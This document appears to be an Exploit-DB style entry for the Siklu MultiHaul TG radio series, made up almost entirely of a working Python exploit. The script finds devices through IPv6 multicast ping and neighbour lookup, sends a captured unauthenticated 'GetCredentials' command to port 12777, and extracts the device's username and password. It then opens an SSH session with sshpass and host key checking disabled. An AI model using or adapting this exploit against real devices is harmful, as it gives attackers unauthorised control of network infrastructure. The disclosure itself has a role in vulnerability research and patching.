# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure # Date: 28-02-2024 # Exploit Author: semaja2 # Vendor Homepage: https://siklu.com/ # Software Link: https://partners.siklu.com/home/frontdoor # Version: < 2.0.0 # Tested on: 2.0.0 # CVE : None assigned # # Instructions # 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device # `ping6 -I en7 -c 2 ff02::1` # 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address # `ip -6 neigh show dev en7` # 3. Execute script # `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7` # 4. Enjoy the access import socket import sys import os address = str(sys.argv[1]) # the target port = 12777 # Captured command, sends "GetCredentials" to obtain random generated username/password cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000") addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM) (family, socktype, proto, canonname, sockaddr) = addrinfo[0] s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) s.connect(sockaddr) s.send(cmd) data = s.recv(200) s.close() output = "".join(map(chr, data)) # Split output, then remove trailing noise as string length is always 35 splits = output.split('#') username = splits[1][slice(0, 35, 1)] password = splits[2][slice(0, 35, 1)] print('Username: ', username) print('Password: ', password) os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))